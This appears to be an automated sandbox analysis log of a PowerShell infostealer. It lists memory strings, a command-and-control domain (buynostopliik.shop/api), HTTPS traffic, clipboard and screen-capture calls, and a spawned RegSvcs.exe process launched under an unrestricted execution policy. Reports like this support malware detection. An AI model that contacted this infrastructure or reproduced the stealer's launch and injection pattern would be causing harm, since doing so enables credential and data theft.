Source: powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2275070968.000002C180001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/_
Source: RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.2415764564.000000000147A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/api
Source: RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/api8
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000141A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/apiI
Source: RegSvcs.exe, 00000003.00000002.2415764564.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/apiZW
Source: RegSvcs.exe, 00000003.00000002.2415764564.000000000147A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/api~
Source: RegSvcs.exe, 00000003.00000002.2414733395.000000000143C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop/g
Source: RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop:443/api
Source: RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop:443/api.default-release/key4.dbPK
Source: RegSvcs.exe, 00000003.00000002.2414733395.0000000001403000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://buynostopliik.shop:443/apiK
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2275070968.000002C181A63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2309337491.000002C1E8D2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2275070968.000002C1810F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000000.00000002.2275070968.000002C181AEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2293833116.000002C19007F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000000.00000002.2275070968.000002C1816B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49834
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49788 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49834 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004363E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004363E0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

3_2_004363E0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_00436590 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

3_2_00436590

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410A470	0_2_00007FFD3410A470
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34103E65	0_2_00007FFD34103E65
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34102EFA	0_2_00007FFD34102EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34104035	0_2_00007FFD34104035
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410D850	0_2_00007FFD3410D850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410C0A4	0_2_00007FFD3410C0A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34105180	0_2_00007FFD34105180
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34104A70	0_2_00007FFD34104A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415975	3_2_00415975
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427A50	3_2_00427A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00420440	3_2_00420440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00410446	3_2_00410446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442460	3_2_00442460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442DE0	3_2_00442DE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00423E44	3_2_00423E44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042DEE5	3_2_0042DEE5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040D690	3_2_0040D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00408740	3_2_00408740
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043B7B0	3_2_0043B7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00430050	3_2_00430050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00411078	3_2_00411078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042A810	3_2_0042A810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00433810	3_2_00433810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004270D0	3_2_004270D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004058E0	3_2_004058E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042D893	3_2_0042D893
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004148B0	3_2_004148B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004288BA	3_2_004288BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00436140	3_2_00436140
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040A910	3_2_0040A910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441910	3_2_00441910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00403920	3_2_00403920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004091C0	3_2_004091C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004161DF	3_2_004161DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004311E6	3_2_004311E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00432188	3_2_00432188
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406190	3_2_00406190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042F195	3_2_0042F195
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004421B0	3_2_004421B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041E250	3_2_0041E250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441A56	3_2_00441A56
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041B200	3_2_0041B200
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004042D0	3_2_004042D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BAD0	3_2_0041BAD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00433AD0	3_2_00433AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00431A88	3_2_00431A88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441A94	3_2_00441A94
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041AA90	3_2_0041AA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00442A90	3_2_00442A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004082A0	3_2_004082A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C370	3_2_0041C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00420B10	3_2_00420B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402B20	3_2_00402B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042ABC0	3_2_0042ABC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441BD0	3_2_00441BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004273A0	3_2_004273A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00417451	3_2_00417451
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441C60	3_2_00441C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00419470	3_2_00419470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00404C00	3_2_00404C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00407400	3_2_00407400
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043C410	3_2_0043C410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042ECD0	3_2_0042ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00414C9C	3_2_00414C9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0042CCA0	3_2_0042CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E4B0	3_2_0040E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00426D70	3_2_00426D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00428D76	3_2_00428D76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041A574	3_2_0041A574
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00405DC0	3_2_00405DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004245C0	3_2_004245C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004165EE	3_2_004165EE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415590	3_2_00415590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004095A0	3_2_004095A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00415E42	3_2_00415E42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00413E50	3_2_00413E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040AE60	3_2_0040AE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041BE00	3_2_0041BE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00406620	3_2_00406620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00402EF0	3_2_00402EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043EE80	3_2_0043EE80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00418690	3_2_00418690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0043AEA0	3_2_0043AEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00419710	3_2_00419710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041F710	3_2_0041F710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0041C7D0	3_2_0041C7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004427E0	3_2_004427E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00427F8D	3_2_00427F8D

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00413E40 appears 72 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00407F90 appears 49 times

Source: classification engine

Classification label: mal100.troj.spyw.evad.winPS1@4/5@1/1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_0043B7B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

3_2_0043B7B0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3ufdayp.g3z.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: 87.247.158.212.ps1

Virustotal: Detection: 8%

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\87.247.158.212.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdatauser.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410BC8C pushad ; iretd	0_2_00007FFD3410BC8D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410EF6E push ds; ret	0_2_00007FFD3410EF6F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD3410A8DC push ebx; retf	0_2_00007FFD3410A8DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD341000BD pushad ; iretd	0_2_00007FFD341000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 0_2_00007FFD34100952 push E95B7DD0h; ret	0_2_00007FFD341009C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00441860 push eax; mov dword ptr [esp], 424D4C7Fh	3_2_00441864
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00412633 push FFFFFF83h; ret	3_2_00412635

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
